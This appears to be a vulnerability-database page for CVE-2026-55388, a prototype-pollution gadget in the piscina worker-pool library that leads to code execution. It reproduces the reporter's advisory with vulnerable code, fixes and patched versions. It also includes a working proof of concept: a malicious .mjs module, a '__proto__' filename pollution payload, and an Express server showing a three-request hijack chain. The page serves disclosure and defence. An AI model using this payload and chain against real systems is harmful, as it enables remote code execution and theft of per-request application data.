Skip to main content

piscina CVE-2026-55388

| EUVDEUVD-2026-38320 HIGH
Code Injection (CWE-94)
2026-06-18 https://github.com/piscinajs/piscina GHSA-x9g3-xrwr-cwfg
8.1
CVSS 3.1 · Vendor: https://github.com/piscinajs/piscina
Share

Severity by source

Vendor (https://github.com/piscinajs/piscina) PRIMARY
8.1 HIGH
AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
vuln.today AI
8.1 HIGH

Network-reachable via app endpoints, no auth at piscina layer (PR:N), but AC:H reflects required upstream PP source plus attacker-writable .mjs path; full RCE yields C/I/A:H.

3.1 AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
4.0 AV:N/AC:H/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
Red Hat
8.1 HIGH
qualitative

Primary rating from Vendor (https://github.com/piscinajs/piscina).

CVSS VectorVendor: https://github.com/piscinajs/piscina

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
Attack Vector
Network
Attack Complexity
High
Privileges Required
None
User Interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
High
Availability
High

Lifecycle Timeline

3
Source Code Evidence Fetched
Jun 18, 2026 - 14:03 vuln.today
Analysis Generated
Jun 18, 2026 - 14:03 vuln.today
CVE Published
Jun 18, 2026 - 13:05 github-advisory
HIGH 8.1

Blast Radius

ecosystem impact
† from your stack dependencies † transitive graph · vuln.today resolves 4-path depth
  • 4 npm packages depend on piscina (4 direct, 0 indirect)

Ecosystem-wide dependent count for version 5.0.0-alpha.0.

DescriptionCVE.org

Summary

piscina's constructor and run() paths read the filename option via plain member access:

js
// dist/index.js line 92 (constructor)
const filename = options.filename
  ? (0, common_1.maybeFileURLToPath)(options.filename)
  : null;
this.options = { ...kDefaultOptions, ...options, filename, maxQueue: 0 };

// dist/index.js line 616 (run())
run(task, options = kDefaultRunOptions) {
    if (options === null || typeof options !== 'object') {
        return Promise.reject(new TypeError('options must be an object'));
    }
    const { transferList, filename, name, signal } = options;

Both reads fall through the prototype chain when the caller's options object doesn't have filename as an own property. When Object.prototype.filename is polluted upstream - by any of the well-documented PP-source CVEs (lodash<4.17.13, qs<6.10.3, set-value<4.1.0, minimist<1.2.6, deepmerge<4.2.2, and others) - the inherited value flows to worker_threads.Worker import and the attacker's .mjs runs in the worker.

Subtlety: calling pool.run(task) with no second arg uses kDefaultRunOptions which has filename: null as an OWN property - that path DOES NOT fire. The vulnerable shape is when the caller passes their own options object (commonly {signal: ac.signal} for abort support, {name: ...} for task labelling, etc.). These caller-built options objects inherit from Object.prototype unless the caller explicitly uses Object.create(null).

Impact

Two preconditions:

  1. Upstream PP-source somewhere in the process - common in transitive deps
  2. Attacker-controllable .mjs at a known filesystem path - realistic via upload endpoints, /tmp races, predictable node_modules paths, or supply-chain

Once both fire:

  • Every pool.run(task, opts) call across the entire process is hijacked
  • Attacker's exported function is called with the legitimate caller's task data - attacker reads per-request app data
  • Attacker controls the return value - caller receives worker_response.by = "ATTACKER-WORKER" and any other attacker-supplied response fields - attacker can poison return values to legitimate clients
  • Hijack persists until process restart

Strictly worse than the analogous pino chain because piscina actually *invokes* the attacker function with caller data on every dispatch (pino imports the attacker module once and errors out).

Affected versions

Empirically verified vulnerable on piscina@5.1.4 (latest stable at time of disclosure). The bug shape is in the constructor's options.filename read at line 92 of dist/index.js, present since the worker-pool API stabilized - likely all 3.x / 4.x / 5.x affected.

Proof of concept

A) Minimal in-process PoC

js
import fs from 'fs';

// 1) Drop the attacker module (any path the victim process can read)
fs.writeFileSync('/tmp/atk.mjs', `
  import fs from 'fs';
  fs.writeFileSync('/tmp/PISCINA_RCE_SENTINEL', JSON.stringify({
    rce: 'CONFIRMED', pid: process.pid, argv1: process.argv[1],
  }));
  export default function(arg) { return 'attacker-return-' + JSON.stringify(arg); }
`);

// 2) Upstream PP-source - pollute Object.prototype.filename
//    (representative of CVE-2019-10744 lodash<4.17.13, CVE-2022-24999 qs<6.10.3,
//     and ~30 historical PP-source CVEs)
const payload = JSON.parse('{"__proto__":{"filename":"/tmp/atk.mjs"}}');
function vulnMerge(t, s) {
  for (const k of Object.keys(s)) {
    if (s[k] !== null && typeof s[k] === 'object') {
      if (!t[k]) t[k] = {};
      vulnMerge(t[k], s[k]);
    } else t[k] = s[k];
  }
}
vulnMerge({}, payload);

// 3) Piscina with empty options inherits the polluted filename
const { Piscina } = await import('piscina');
const p = new Piscina({});                        // inherits filename
const result = await p.run({});                   // worker imports /tmp/atk.mjs
await p.destroy();

// 4) sentinel exists; attacker fn was called with task data
console.log(fs.readFileSync('/tmp/PISCINA_RCE_SENTINEL', 'utf8'));
console.log('attacker fn returned:', result);
// → "attacker-return-{}"

B) Full-stack HTTP chain (this is the realistic shape)

A correctly-initialized pool gets hijacked by attacker activity. Pool is created at server boot with a legitimate worker, then per-request handlers call pool.run(req.body, {signal: ac.signal}) - the standard abort-aware shape.

js
// === server.mjs ===
import express from 'express';
import { Piscina } from 'piscina';

// Vulnerable PP-source middleware (lodash<4.17.13 equivalent)
function vulnMerge(t, s) {
  for (const k of Object.keys(s)) {
    if (s[k] !== null && typeof s[k] === 'object') {
      if (!t[k]) t[k] = {};
      vulnMerge(t[k], s[k]);
    } else t[k] = s[k];
  }
}

// CORRECT pool init at boot
const pool = new Piscina({
  filename: './valid-worker.mjs',
  minThreads: 1, maxThreads: 2,
});

const config = {};
const app = express();

app.post('/api/settings', express.json(), (req, res) => {
  vulnMerge(config, req.body);                    // PP source
  res.json({ ok: true });
});

app.post('/api/process', express.json(), async (req, res) => {
  const ac = new AbortController();
  const result = await pool.run(req.body, { signal: ac.signal });  // <-- hijacked
  res.json({ ok: true, worker_response: result });
});

app.listen(7755);

// === Attacker, 3 HTTP requests ===
// POST /upload  → drops /tmp/atk.mjs
// POST /api/settings with body: {"__proto__":{"filename":"/tmp/atk.mjs"}}
// POST /api/process → pool.run() destructures filename via prototype
//                  → worker imports /tmp/atk.mjs
//                  → attacker fn called with req.body of THIS request
//                  → caller receives attacker-shaped response

Empirical observation on piscina@5.1.4 + Node 23.11.0:

  • Pre-attack /api/process returns {by: 'valid-worker'}
  • Cold-path /probe after PP source confirms ({}).filename is polluted process-wide
  • Post-attack /api/process returns {by: 'ATTACKER-WORKER', processed: <caller's exfil data>}
  • Sentinel file written from inside piscina/dist/worker.js with the worker process's uid + env access

Recommended fix

Minimal - own-property guard at both option-read sites:

js
// constructor (line 92)
const userFilename = Object.prototype.hasOwnProperty.call(options, 'filename')
  ? options.filename
  : null;
const filename = userFilename
  ? (0, common_1.maybeFileURLToPath)(userFilename)
  : null;

// run() (line 616)
const safeOpts = Object.create(null);
Object.assign(safeOpts, options);          // copies own props only? - keeps shape
const { transferList, filename, name, signal } = safeOpts;

More idiomatic - use a null-prototype working object throughout this.options:

js
const safeOpts = Object.create(null);
Object.assign(safeOpts, kDefaultOptions, options);
this.options = safeOpts;
this.options.filename = safeOpts.filename
  ? (0, common_1.maybeFileURLToPath)(safeOpts.filename)
  : null;
this.options.maxQueue = 0;

Either approach closes the gadget without breaking any legitimate caller pattern.

The pattern is the same as recommended for axios CVE-2026-44494 and the pino PSA filed earlier today. Cross-fix consideration: any other library you maintain that uses similar options.X member-access for worker / child-process / module-load operations is worth a quick audit.

Coordination

  • Same maintainer as pino - you're already in security-triage mode for that PSA. Happy to coordinate timing / disclosure dates across both.
  • Will not share publicly until GHSA published or 90 days.
  • Please credit ridingsa if you choose to credit a reporter.

How this was discovered

Generalized the pino disclosure's mechanism - any library that reads a string option via plain member access and dynamic-loads it (via import() / require() / new Worker()) is a candidate. Ran a sweep across 10 candidate libraries; piscina + fastify (via pino propagation) fired. Piscina is independently vulnerable through its own option-read sites, hence this separate disclosure.

AnalysisAI

{signal} for abort support), the polluted prototype value flows into worker_threads.Worker and the attacker's exported function is invoked with every legitimate caller's task data. Publicly available exploit code exists (full PoC in the GHSA advisory), but no public exploit identified at time of analysis as in-the-wild abuse and the CVE is not in CISA KEV.

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Recon
Identify Node.js service using piscina with PP-source dep
Delivery
Upload attacker .mjs to known path
Exploit
POST polluting JSON to merge endpoint
Install
Trigger pool.run with caller-built options
C2
Worker imports attacker module via inherited filename
Execute
Attacker function executes with caller task data
Impact
Exfiltrate per-request data and poison responses

Vulnerability AssessmentAI

Exploitation Exploitation requires two stacked preconditions explicitly named by the reporter: (1) an upstream prototype-pollution sink reachable from attacker input - typically a vulnerable recursive merge in lodash<4.17.13, qs<6.10.3, set-value<4.1.0, minimist<1.2.6, or deepmerge<4.2.2 - that lets the attacker set Object.prototype.filename, and (2) an attacker-controllable .mjs file at a filesystem path the victim process can read (file upload endpoint, /tmp race, predictable node_modules path, or supply-chain plant). … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H vector (8.1 High) reflects the gadget nature: full RCE impact but AC:H captures the two stacked preconditions - an upstream PP source AND an attacker-writable .mjs at a known filesystem path. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker sends three HTTP requests to a Node.js server using piscina with a transitively vulnerable PP source: (1) a file-upload request that drops /tmp/atk.mjs, (2) a JSON POST to any endpoint that merges user input into a config object using a vulnerable recursive merge, with body {"__proto__":{"filename":"/tmp/atk.mjs"}}, and (3) a normal POST to /api/process which calls pool.run(req.body, {signal: ac.signal}); piscina destructures filename from the prototype, spawns a Worker importing /tmp/atk.mjs, and the attacker's exported function is invoked with the legitimate caller's task data on every subsequent dispatch until process restart. Publicly available exploit code exists in the GHSA advisory.
Remediation Vendor-released patch: upgrade to piscina 5.2.0 (5.x branch), 4.9.3 (4.x branch), or 6.0.0-rc.2 (6.x prerelease) per GHSA-x9g3-xrwr-cwfg. … Detailed patch versions, workarounds, and compensating controls in full report.

Recommended ActionAI

Within 24 hours: Identify all production Node.js applications using the worker_threads module and document the data sensitivity of information passed to workers. …

Sign in for detailed remediation steps and compensating controls.

Threat intelligence, references, and detailed analysis are available after sign-in.

Vendor StatusVendor

Share

CVE-2026-55388 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy